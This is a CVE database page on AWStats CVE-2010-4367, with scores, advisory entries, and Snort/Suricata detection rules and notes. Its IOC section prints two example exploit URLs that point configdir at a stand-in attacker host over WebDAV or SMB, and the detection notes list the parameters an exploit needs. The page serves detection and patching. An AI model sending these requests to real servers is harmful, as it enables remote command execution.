CVE-2010-4367
published 2010-12-02CVE-2010-4367: awstats.cgi in AWStats before 7.0 accepts a configdir parameter in the URL, which allows remote attackers to execute arbitrary commands via a crafted…
PriorityP268high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
27.67%
97.8th percentile
awstats.cgi in AWStats before 7.0 accepts a configdir parameter in the URL, which allows remote attackers to execute arbitrary commands via a crafted configuration file located on a (1) WebDAV server or (2) NFS server.
Affected
38 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| awstats | awstats | <= 6.95 | — |
| awstats | awstats | — | — |
| awstats | awstats | — | — |
| awstats | awstats | — | — |
| awstats | awstats | — | — |
| awstats | awstats | — | — |
| awstats | awstats | — | — |
| awstats | awstats | — | — |
| awstats | awstats | — | — |
| awstats | awstats | — | — |
| awstats | awstats | — | — |
| awstats | awstats | — | — |
| awstats | awstats | — | — |
| awstats | awstats | — | — |
| awstats | awstats | — | — |
| awstats | awstats | — | — |
| awstats | awstats | — | — |
| awstats | awstats | — | — |
| awstats | awstats | — | — |
| awstats | awstats | — | — |
| awstats | awstats | — | — |
| awstats | awstats | — | — |
| awstats | awstats | — | — |
| awstats | awstats | — | — |
| awstats | awstats | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlhttp://www.example.com/cgi-bin/awstats.cgi?config=attacker&pluginmode=rawlog&configdir=\\Attacker-IPAddress:80\webdav↗
urlhttp://www.example.com/cgi-bin/awstats.cgi?config=attacker&pluginmode=rawlog&configdir=\\Attacker-IPAddress\SMB-Share↗
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Attempt"; flow:established,to_server; http.uri; content:"awstats.cgi"; nocase; content:"config="; nocase; content:"pluginmode=rawlog"; nocase; content:"configdir=|5C 5C|"; nocase; fast_pattern; reference:bid,45123; reference:cve,2010-4367; classtype:web-application-attack; sid:2012393; rev:4; metadata:created_at 2011_03_01, cve CVE_2010_4367, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_13;)
bytes
|5C 5C|
- →Look for HTTP requests to awstats.cgi containing both 'pluginmode=rawlog' and 'configdir=\\' (UNC path prefix, bytes 5C 5C) in the URI — this is the canonical exploit pattern for CVE-2010-4367 targeting WebDAV/SMB shares.
- →The attack requires three URL parameters to be present simultaneously: config=<arbitrary>, pluginmode=rawlog, and configdir=\\<attacker-controlled-host>\<share>. Alerting on any URI containing all three is high-fidelity. ↗
- →Two distinct transport variants exist: WebDAV over port 80 (configdir=\\host:80\webdav) targeting Windows XP + Apache Tomcat, and SMB (configdir=\\host\share) targeting Windows 2003/XP. Monitor for both UNC path styles in web server logs. ↗
- ·Exploitation is primarily Windows-specific (WebDAV/SMB UNC paths). On Linux, the attack is not straightforwardly reproducible without non-default automount configuration, making the impact significantly lower on Linux deployments. ↗
- ·The Emergingthreats Snort rule (sid:2012393) specifically targets the UNC-path variant of the exploit; Linux-based configdir path traversal attacks (local filesystem) would not be caught by this signature alone.
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv7.5HIGH
vendor_debian7.5LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-p75r-4c9j-53m6: awstats
ghsa_unreviewed·2022-05-17
CVE-2010-4367 [HIGH] CWE-94 GHSA-p75r-4c9j-53m6: awstats
awstats.cgi in AWStats before 7.0 accepts a configdir parameter in the URL, which allows remote attackers to execute arbitrary commands via a crafted configuration file located on a (1) WebDAV server or (2) NFS server.
OSV
CVE-2010-4367: awstats
osv·2010-12-02·CVSS 7.5
CVE-2010-4367 [HIGH] CVE-2010-4367: awstats
awstats.cgi in AWStats before 7.0 accepts a configdir parameter in the URL, which allows remote attackers to execute arbitrary commands via a crafted configuration file located on a (1) WebDAV server or (2) NFS server.
Debian
CVE-2010-4367: awstats - awstats.cgi in AWStats before 7.0 accepts a configdir parameter in the URL, whic...
vendor_debian·2010·CVSS 7.5
CVE-2010-4367 [HIGH] CVE-2010-4367: awstats - awstats.cgi in AWStats before 7.0 accepts a configdir parameter in the URL, whic...
awstats.cgi in AWStats before 7.0 accepts a configdir parameter in the URL, which allows remote attackers to execute arbitrary commands via a crafted configuration file located on a (1) WebDAV server or (2) NFS server.
Scope: local
bookworm: resolved (fixed in 6.9.5~dfsg-5)
bullseye: resolved (fixed in 6.9.5~dfsg-5)
forky: resolved (fixed in 6.9.5~dfsg-5)
sid: resolved (fixed in 6.9.5~dfsg-5)
trixie: resolved (fixed in 6.9.5~dfsg-5)
Suricata
ET WEB_SPECIFIC_APPS Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Attempt
suricata·2011-03-01
CVE-2010-4367 ET WEB_SPECIFIC_APPS Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Attempt
ET WEB_SPECIFIC_APPS Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Attempt
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Attempt"; flow:established,to_server; http.uri; content:"awstats.cgi"; nocase; content:"config="; nocase; content:"pluginmode=rawlog"; nocase; content:"configdir=|5C 5C|"; nocase; fast_pattern; reference:bid,45123; reference:cve,2010-4367; classtype:web-application-attack; sid:2012393; rev:4; metadata:created_at 2011_03_01, cve CVE_2010_4367, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_13;)
http://awstats.sourceforge.net/docs/awstats_changelog.txthttp://www.exploitdevelopment.com/Vulnerabilities/2010-WEB-001.htmlhttp://www.mandriva.com/security/advisories?name=MDVSA-2011:033http://awstats.sourceforge.net/docs/awstats_changelog.txthttp://www.exploitdevelopment.com/Vulnerabilities/2010-WEB-001.htmlhttp://www.mandriva.com/security/advisories?name=MDVSA-2011:033
2010-12-02
Published